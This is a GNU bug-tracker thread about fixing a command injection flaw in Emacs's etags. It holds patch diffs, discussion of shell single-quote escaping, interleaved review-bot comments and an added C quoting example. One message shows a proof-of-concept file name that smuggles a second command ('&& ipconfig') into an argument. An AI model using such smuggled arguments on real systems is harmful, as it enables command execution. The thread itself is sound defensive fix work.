@@ -7707,6 +7712,55 @@ etags_mktmp (void) return templt; } +/* + * Adds single quotes around a string, if found single quotes, escaped it. + * Return a newly-allocated string. + * + * For example: + * escape_shell_arg_string("test.txt") => 'test.txt' + * escape_shell_arg_string("'test.txt") => ''\''test.txt' + */ +static char * +escape_shell_arg_string (char *str) +{ + char *p = str; + int need_space = 2; /* ' at begin and end */ + + while (*p != '\0') + { + if (*p == '\'') + need_space += 4; /* ' to '\'', length is 4 */ + else + need_space++; + + p++; + } + + char *new_str = xnew (need_space + 1, char); + new_str[0] = '\''; + new_str[need_space-1] = '\''; + + int i = 1; /* skip first byte */ + p = str; + while (*p != '\0') + { + new_str[i] = *p; + if (*p == '\'') + { + new_str[i+1] = '\\'; + new_str[i+2] = '\''; + new_str[i+3] = '\''; + i += 3; + } + + i++; + p++; + } + + new_str[need_space] = '\0'; + return new_str; +} + static void do_move_file(const char *src_file, const char *dst_file) { -- 2.38.1
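Review bot: the process_file_name hunk is identical to the first revision, so the point already raised in review still stands: in the `#if MSDOS || DOS_NT` branch, `concat (cmd1, "\" > ", tmp_name)` appends `tmp_name` unquoted. Even on a platform whose file names cannot contain quote characters, `tmp_name` is not a scanned file name but the product of `etags_mktmp`, so that branch should at least wrap `tmp_name` in double quotes the way it already does for `real_name`.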
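Review bot: only the `static char *` spacing changed in the escape_shell_arg_string hunk; the parameter is still `char *str` although the function never writes through it, so `const char *str` is the right signature (with the prototype in the first hunk updated to match), and `need_space` and `i` remain `int` rather than `ptrdiff_t`. The header comment is also unchanged and should explain the `'\''` sequence (close the quoted word, escaped `'`, reopen), since the question of why `\'` alone is not enough has already come up and the answer belongs next to the code.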
From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 09:33:50 2022
Date: Tue, 06 Dec 2022 16:33:19 +0200
Message-Id: <83edtc7gb4.fsf@gnu.org>
From: Eli Zaretskii
To: Andreas Schwab
Cc: lx@shellcodes.org, stefankangas@gmail.com, 59817@debbugs.gnu.org
In-Reply-To: (message from Andreas Schwab on Tue, 06 Dec 2022 14:05:16 +0100)
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org>

> From: Andreas Schwab
> Cc: Eli Zaretskii, Stefan Kangas, 59817@debbugs.gnu.org
> Date: Tue, 06 Dec 2022 14:05:16 +0100
>
> There is a shell_quote function in gnulib.

I know. But we don't import that module, AFAICT.

From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 09:53:04 2022
Date: Tue, 06 Dec 2022 16:52:40 +0200
Message-Id: <83bkog7fev.fsf@gnu.org>
From: Eli Zaretskii
To: lux
Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org
In-Reply-To: (message from lux on Tue, 6 Dec 2022 21:11:35 +0800)
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org>

> Date: Tue, 6 Dec 2022 21:11:35 +0800
> From: lux
> Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org
>
> On Tue, 06 Dec 2022 14:55:09 +0200
> Eli Zaretskii wrote:
>
> > The "MSDOS || DOS_NT" case also needs a small change:
> >
> > > char *cmd = concat (cmd1, "\" > ", tmp_name);
> >
> > This doesn't quote tmp_name; it should.
>
> Because double quotes have been used here

The double quotes are only around real_name, but not around tmp_name.
One of the issues you originally described was a bogus value of the
TEMP environment variable, which gets used in etags_mktmp that produces
tmp_name.

> I have not reproduced this
> vulnerability in Windows, so I have not dealt with it:
>
> $ touch "etags.c\" && ipconfig \".z"
> $ ./etags.exe "etags.c\" && ipconfig \".z"
> etags.c" && ipconfig ".z: Invalid argument

Windows file names cannot include quote characters, so don't use them.
And it's the TEMP value that you need to tweak, not the file names etags
scans.

> > I don't understand why you are adding ''\'' and not just \'.
> > Wouldn't the latter work for some reason?
> >
>
> Because the single quote escape is: '\''
>
> $ echo ''\''hello world'\'''
> 'hello world'
> $ echo 'I'\''m a poor man'
> I'm a poor man

I don't understand why you need an extra pair of quotes in the expanded
string.

  $ echo \''hello; world'
  'hello; world

As you see, the semi-colon was successfully hidden from the shell.

What am I missing?
From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 10:06:04 2022
Message-Id: <87r0xctvvs.fsf@tucano.isti.cnr.it>
From: Francesco Potortì
Date: Tue, 06 Dec 2022 16:05:59 +0100
To: Eli Zaretskii
Cc: lux, 59817@debbugs.gnu.org, stefankangas@gmail.com
In-Reply-To: <83bkog7fev.fsf@gnu.org> (eliz@gnu.org)
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org> <83bkog7fev.fsf@gnu.org>
Organization: The GNU project

>I don't understand why you need an extra pair of quotes in the expanded
>string.
>
> $ echo \''hello; world'
> 'hello; world
>
>As you see, the semi-colon was successfully hidden from the shell.
>
>What am I missing?

That only works at the beginning or end of a string.  In general, inside a
single-quoted string, single quotes are not allowed.  So, to include a
single quote inside a single-quoted string, you have to:

- close the quoted string using '
- put a literal single quote using \'
- reopen the quoted string using '

If you want to avoid checking for the special cases of a stray single
string at beginning or end of the original string, you just quote
everything with a single quote at beginning and end, and then substitute
each ' with '\''.
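Francesco's rule above, as an added example in C (my own code, not from etags.c or from anyone in this thread; `posix_shell_quote` and `shell_word` are names I chose): `posix_shell_quote` does the wrap-and-substitute step, and `shell_word` is a small model of how a POSIX shell reads a word back, so one can check mechanically that the quoted form yields the original name while the bare `\'` form survives only when the stray quote sits at the edge of the string.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Quote STR for a POSIX shell as Francesco describes: wrap it in single
   quotes and turn each embedded ' into '\''.  Returns a malloc'ed string.  */
char *posix_shell_quote (const char *str)
{
  size_t n = 2;                               /* opening and closing quote */
  for (const char *p = str; *p; p++)
    n += (*p == '\'') ? 4 : 1;
  char *out = malloc (n + 1), *q = out;
  if (!out) return NULL;
  *q++ = '\'';
  for (const char *p = str; *p; p++)
    if (*p == '\'')
      { memcpy (q, "'\\''", 4); q += 4; }    /* close, escaped ', reopen */
    else
      *q++ = *p;
  *q++ = '\'';
  *q = '\0';
  return out;
}

/* Model of how a POSIX shell reads ONE word from QUOTED, honouring only
   single quotes and backslash escapes.  Stores the word the program would
   receive in OUT and returns 1; returns 0 if a quote is unbalanced, OUT is
   too small, or an unquoted metacharacter would be parsed as an operator.  */
int shell_word (const char *quoted, char *out, size_t outlen)
{
  size_t n = 0;
  for (const char *p = quoted; *p; )
    {
      char c;
      if (*p == '\'')                         /* literal run up to next ' */
        {
          const char *end = strchr (p + 1, '\'');
          if (!end) return 0;                 /* unterminated quote */
          for (p++; p < end; p++)
            {
              if (n + 1 >= outlen) return 0;
              out[n++] = *p;
            }
          p = end + 1;
          continue;
        }
      if (*p == '\\' && p[1])                 /* \x outside quotes is x */
        { c = p[1]; p += 2; }
      else if (strchr (" \t;|&$`<>()", *p))  /* operator, not argument */
        return 0;
      else
        c = *p++;
      if (n + 1 >= outlen) return 0;
      out[n++] = c;
    }
  out[n] = '\0';
  return 1;
}

int main (void)
{
  char word[64], *q = posix_shell_quote ("it's a file; echo hi");
  if (q && shell_word (q, word, sizeof word))
    printf ("%s -> %s\n", q, word);           /* constructed sample input */
  free (q);
}
```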
From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 10:49:23 2022
Date: Tue, 6 Dec 2022 23:49:05 +0800
From: lux
To: Eli Zaretskii
Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
X-OQ-MSGID: <20221206234905.58c5f727@lx-pc>
In-Reply-To: <83bkog7fev.fsf@gnu.org>
References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org> <83bkog7fev.fsf@gnu.org>
X-Mailer: Claws Mail 4.1.1 (GTK 3.24.35; x86_64-redhat-linux-gnu)

On Tue, 06 Dec 2022 16:52:40 +0200
Eli Zaretskii wrote:

> Windows file names cannot include quote characters, so don't use
> them.  And it's the TEMP value that you need to tweak, not the file names
> etags scans.

Thank you, fixed.

> I don't understand why you need an extra pair of quotes in the
> expanded string.
>
>   $ echo \''hello; world'
>   'hello; world
>
> As you see, the semi-colon was successfully hidden from the shell.
>
> What am I missing?

$ echo Emacs > "'hello'world"
$ cat '\''hello\''world'            <---- use \'', error
cat: '\hello\world': No such file or directory
$ cat ''\''hello'\''world'          <---- use '\''
Emacs

You can also refer to:

1. https://stackoverflow.com/questions/48970174/escape-single-quote-in-command-argument-to-sh-c
2. And I found a similar function in PHP:

$ cat test.php

From d1dd12396b7d99ff93e6a846c96ae600addac847 Mon Sep 17 00:00:00 2001
From: lu4nx Date: Tue, 6 Dec 2022 15:42:40 +0800 Subject: [PATCH] Fix etags local command injection vulnerability * lib-src/etags.c: (escape_shell_arg_string): New function. --- lib-src/etags.c | 63 +++++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 58 insertions(+), 5 deletions(-) diff --git a/lib-src/etags.c b/lib-src/etags.c index d1d20858cd..ba0092cc63 100644 --- a/lib-src/etags.c +++ b/lib-src/etags.c @@ -401,6 +401,7 @@ #define xrnew(op, n, m) ((op) = xnrealloc (op, n, (m) * sizeof *(op))) static void put_entries (node *); static void cleanup_tags_file (char const * const, char const * const); +static char *escape_shell_arg_string (char *); static void do_move_file (const char *, const char *); static char *concat (const char *, const char *, const char *); static char *skip_spaces (char *); @@ -1713,13 +1714,16 @@ process_file_name (char *file, language *lang) else { #if MSDOS || defined (DOS_NT) - char *cmd1 = concat (compr->command, " \"", real_name); - char *cmd = concat (cmd1, "\" > ", tmp_name); + int buf_len = strlen (compr->command) + strlen (" \"\" > \"\"") + strlen (real_name) + strlen (tmp_name) + 1; + char *cmd = xmalloc (buf_len); + snprintf (cmd, buf_len, "%s \"%s\" > \"%s\"", compr->command, real_name, tmp_name); #else - char *cmd1 = concat (compr->command, " '", real_name); - char *cmd = concat (cmd1, "' > ", tmp_name); + char *new_real_name = escape_shell_arg_string (real_name); + char *new_tmp_name = escape_shell_arg_string (tmp_name); + int buf_len = strlen (compr->command) + strlen (" > ") + strlen (new_real_name) + strlen (new_tmp_name) + 1; + char *cmd = xmalloc (buf_len); + snprintf (cmd, buf_len, "%s %s > %s", compr->command, new_real_name, new_tmp_name); #endif - free (cmd1); inf = (system (cmd) == -1 ? NULL : fopen (tmp_name, "r" FOPEN_BINARY)); 
@@ -7707,6 +7711,55 @@ etags_mktmp (void) return templt; } +/* + * Adds single quotes around a string, if found single quotes, escaped it. + * Return a newly-allocated string. + * + * For example: + * escape_shell_arg_string("test.txt") => 'test.txt' + * escape_shell_arg_string("'test.txt") => ''\''test.txt' + */ +static char * +escape_shell_arg_string (char *str) +{ + char *p = str; + int need_space = 2; /* ' at begin and end */ + + while (*p != '\0') + { + if (*p == '\'') + need_space += 4; /* ' to '\'', length is 4 */ + else + need_space++; + + p++; + } + + char *new_str = xnew (need_space + 1, char); + new_str[0] = '\''; + new_str[need_space-1] = '\''; + + int i = 1; /* skip first byte */ + p = str; + while (*p != '\0') + { + new_str[i] = *p; + if (*p == '\'') + { + new_str[i+1] = '\\'; + new_str[i+2] = '\''; + new_str[i+3] = '\''; + i += 3; + } + + i++; + p++; + } + + new_str[need_space] = '\0'; + return new_str; +} + static void do_move_file(const char *src_file, const char *dst_file) { -- 2.38.1
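Review bot: the new prototype in the @@ -401 hunk, `static char *escape_shell_arg_string (char *);`, takes a non-const pointer although the function only reads its argument; declare it `(char const *)` so it matches the neighbouring `do_move_file (const char *, const char *)` and `concat (const char *, ...)` declarations and can be called with const buffers.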
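Review bot: the non-DOS branch of the @@ -1713 hunk leaks `new_real_name` and `new_tmp_name`: both come freshly allocated from `escape_shell_arg_string` and are never freed after `snprintf` has copied them into `cmd` (the old `free (cmd1);` was dropped with no replacement), so each compressed file costs two allocations for the life of the process; free both right after the `snprintf`. In both branches `int buf_len` receives a sum of `strlen` results, so `size_t` would avoid the implicit narrowing; the arithmetic itself is consistent with the format strings (eight literal characters in `" \"\" > \"\""` against `"%s \"%s\" > \"%s\""`).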
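Review bot: in the @@ -7707 hunk `escape_shell_arg_string` counts with `int need_space` and `int i` while indexing a buffer sized from the input length; use `size_t` (or `ptrdiff_t`) so a very long path cannot overflow the counters, and take `char const *str` since the input is never written. The doc comment should read "if single quotes are found, escape them". The size arithmetic is right: the closing quote lands at `new_str[need_space-1]` and the NUL at `new_str[need_space]`, inside the `need_space + 1` allocation.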
From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 11:15:10 2022
Date: Tue, 06 Dec 2022 18:14:43 +0200
Message-Id: <83359s7bm4.fsf@gnu.org>
From: Eli Zaretskii
To: lux
Cc: stefankangas@gmail.com, 59817-done@debbugs.gnu.org
In-Reply-To: (message from lux on Tue, 6 Dec 2022 23:49:05 +0800)
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org> <83bkog7fev.fsf@gnu.org>

> Date: Tue, 6 Dec 2022 23:49:05 +0800
> From: lux
> Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org
>
> >From d1dd12396b7d99ff93e6a846c96ae600addac847 Mon Sep 17 00:00:00 2001
> From: lu4nx
> Date: Tue, 6 Dec 2022 15:42:40 +0800
> Subject: [PATCH] Fix etags local command injection vulnerability
>
> * lib-src/etags.c:
>
> (escape_shell_arg_string): New function.

Thanks, installed with some minor changes.

From unknown Fri Jun 20 07:16:49 2025
To: internal_control@debbugs.gnu.org
From: Debbugs Internal Request
Subject: Internal Control
Date: Wed, 04 Jan 2023 12:24:05 +0000
User-Agent: Fakemail v42.6.9

# This is a fake control message.
#
# The action:
# bug archived.
thanks
# This fakemail brought to you by your local debbugs
# administrator